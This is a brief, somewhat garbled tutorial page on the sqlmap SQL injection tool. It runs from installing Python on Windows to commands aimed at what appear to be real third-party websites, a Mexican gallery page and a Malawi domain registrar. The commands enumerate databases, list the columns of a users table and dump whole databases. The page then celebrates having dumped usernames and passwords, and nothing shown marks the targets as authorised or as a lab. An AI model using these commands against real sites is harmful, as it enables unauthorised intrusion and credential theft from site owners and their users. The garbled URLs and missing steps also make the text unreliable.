Sqlmaptut
Sqlmaptut
So lets start, About sqlmap:-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
It is coded in python and is the best tool available for sql injection!!!! it can be run even if you are on windows, first of all download python for windows from the official python site:-Here
sqlmap\sqlmap.py -u <website> then it will be:sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1 sqlmap.py -u www.registrar.mw/index.php?domain=google.mw --dbs --threads=10
for finding columns from the tables dulcemaria_users type:-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem
if you want to dump all columns type:-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem --dumpall
3.user
Cheers!....we have dumped the usernames and passwords to check them go to the path you installed sqlmap!!!
mine is:-C:\Documents and Settings\USER\sqlmap\output you will find a folder named output,you will have your dumped data there.